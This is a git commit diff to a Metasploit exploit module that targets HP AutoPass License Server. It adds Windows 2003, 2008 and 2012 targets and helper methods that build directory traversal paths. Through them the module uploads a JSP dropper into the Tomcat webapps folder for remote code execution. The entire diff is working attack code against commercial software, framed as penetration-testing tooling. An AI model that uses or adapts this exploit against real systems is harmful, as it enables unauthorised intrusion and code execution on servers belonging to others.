Land rapid7#3531 - Windows 2008 Update for HP AutoPass License

wchen-r7 · wchen-r7 · commit 8733dcb2f8b4 · 2014-07-16T15:13:05.000-05:00
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
@@ -40,17 +40,49 @@ def initialize(info = {})
       'Arch'        => ARCH_JAVA,
       'Targets'     =>
         [
-          ['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
+          ['Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 7,
+              'InstallFolder' => '/Program Files/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+           {
+               'InstallDepth' => 7,
+               'InstallFolder' => '/Program Files (x86)/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+               'WebappsDepth' => 1
+           }
+          ],
+          ['Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 10 2014'))
 
     register_options(
       [
         Opt::RPORT(5814),
-        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
-        OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
-        OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
+        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass'])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('INSTALL_DEPTH', [false, 'Traversal Depth to reach the HP AutoPass License Server folder']),
+        OptString.new('INSTALL_FOLDER', [false, 'HP AutoPass License Server folder']),
+        OptInt.new('WEBAPPS_DEPTH', [false, 'Traversal Depth to reach the Tomcat webapps folder'])
       ], self.class)
   end
 
@@ -99,7 +131,8 @@ def exploit
     # In order to execute it, through the AutoPass application we would like to drop it here:
     # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
     dropper_traversal = install_traversal
-    dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
+    dropper_traversal << "#{install_folder}/webapps/autopass/scripts/#{dropper_filename}"
+
     res = upload_file(dropper_traversal, dropper)
 
     register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
@@ -140,11 +173,39 @@ def exploit
   end
 
   def webapps_traversal
-    "../" * datastore['WEBAPPS_DEPTH']
+    if datastore['WEBAPPS_DEPTH'] > 0
+      depth = datastore['WEBAPPS_DEPTH']
+    elsif target['WebappsDepth']
+      depth = target['WebappsDepth']
+    else
+      depth = 1
+    end
+
+    "../" * depth
   end
 
   def install_traversal
-    "/.." * datastore['INSTALL_DEPTH']
+    if datastore['INSTALL_DEPTH'] > 0
+      depth = datastore['INSTALL_DEPTH']
+    elsif target['InstallDepth']
+      depth = target['InstallDepth']
+    else
+      depth = 4
+    end
+
+    "/.." * depth
+  end
+
+  def install_folder
+    if !datastore['INSTALL_FOLDER'].blank?
+      folder = datastore['INSTALL_FOLDER']
+    elsif target['InstallFolder']
+      folder = target['InstallFolder']
+    else
+      folder = "/HP AutoPass License Server/HP AutoPass License Server"
+    end
+
+    folder
   end
 
   # Using a JSP dropper because the vulnerability doesn't allow to upload
